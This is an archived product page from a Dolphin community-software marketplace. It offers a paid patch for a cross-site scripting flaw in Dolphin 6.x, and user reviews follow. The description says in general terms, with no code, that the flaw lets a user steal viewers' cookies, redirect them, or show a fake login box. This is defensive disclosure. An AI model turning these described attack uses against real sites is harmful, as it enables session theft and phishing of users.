Community Software SupportBeta 5Join | Login | Help| Search| Terms
TagsBy AuthorBy BudgetBy PopularityRecently posted
This site is now being replaced by BoonEx Unity and now works in "read-only" mode. Please, make sure to save all necessary information from this site before its upcoming shut-down.
Fix XSS vulnerability
Product Details
Posted by:
Version:
1.0.0000
Tags:
dolphin fix site XSS cross scripting vulnerability
Compatible for:
Dolphin v.6.x
Dolphin v.6.0
License:
GNU General Public License (GPL)
Price:
$5
Created:
April 22, 2008 at 07:58
Avg. vote:
9.07
Product Description
Hello and welcome!

I have found a XSS (cross site scripting) vulnerability in Dolphin (all versions 6.0.000X and 6.1 Beta) that allows a registered user to execute a script on anyone who views his/her profile. The malicious user could use it to:

1. Steal the "cookie" of the person viewing his profile, including other users AND the admin!

2. Automatically redirect anyone viewing his profile to another website.

3. Popup a fake login box and record the information entered.

The posibilities are endless because he would actually be running the script from ANOTHER server!

I notified "VictorT" and "Unoboonex" as soon as I found the flaw.. but most of us have sites that are so heavily moded that we will be unable to upgrade to the next version after this vulnerability is fixed so I put this out.

This was JUST discovered and has not hit any of the hacker forums yet.. patch NOW!

*** If you are using the FINAL version of 6.1 you DON'T need this.. if you are using the beta versions or ANY 6.000X versions you are vulnerable! ***

thanks
M.scott
http://www.makeasocialnetwork.com (Patched :-)
Product Images
Comments
Customer
Comment
Vote
Posted
Points: 0
0
Member
i've recently had people trying to sign up using code in their description, but because profiles dont go active until the email has been confirmed i've been blocking the ip address and deleting the profiles, this patch just plays safe for myself and my genuine members.
10
April 22, 2008
 
Points: 10
0
Member
Ohhh your my new sweet tart for today! keep this stuff coming !!
10
April 22, 2008
 
Points: 0
0
Member
Security is a big concern of mine..I am glad this is available..Thanks!!
10
April 22, 2008
 
Points: 0
1
Contributor
since: 24.01.08
I know I liked you for a REASON!!!

Keep it up

ExpertzzzPro
10
April 23, 2008
 
Points: 0
0
Member
Well spotted, and good fix, thanks
10
April 24, 2008
 
Points: 32
0
Member
As ALWAYS, mscott comes through! I SWEAR by this man for MY site.
10
April 25, 2008
 
Points: 0
0
Member
Not being a programmer myself, I don't really understand this issue BUT, I trust Mike and I'm glad he's taken the time to find and solve these kind of problems.

Thanks again !!!
10
May 11, 2008
 
Points: 0
0
Member
Installed without a problem, great fix - thanks
8
May 17, 2008
 
Points: 0
0
Member
Thanks buddy for this fix... I'm not an expert in PHP, but as I read the description of this fix, this can be very serious and if you post this here, every hacker that knows Dolphin system, will know all the vulnerabilities of the community.
10
May 21, 2008
 
Points: 0
1
Contributor
since: 17.04.08
A few minutes to install. Thanks
10
May 22, 2008
 
Points: 0
1
Contributor
since: 08.05.08
This is a great mod. It was installed with no problem and we received excellent customer service from mscott. keep up the good work
8
June 07, 2008
 
Points: 14
0
Member
Thanks for this
10
August 02, 2008
 
Points: 0
0
Member
Thank you for this mod.

I can be sure i am safe now
10
July 15, 2009
 
Points: 142
0
Member
well its been more then 15 days i tried contacting thsi guy coz my site is fully moded so might be the reason i didnt find the code to replace with his in the file. but he isnt responding. very bad
1
July 29, 2009
 
Contribute
Support Expertzzz.com and use a range of Contributor Benefits.
Hosting
The most important thing is to choose the right hosting
Site-wide ad for $10/day. Order Now. 10 Spots Max, Random Positioning.
Home  Downloadz  Forumz  Expertz  Join   Login   Contact Us

Copyright 2008 Expertzzz.com. All rights reserved.
PET:0.326669931412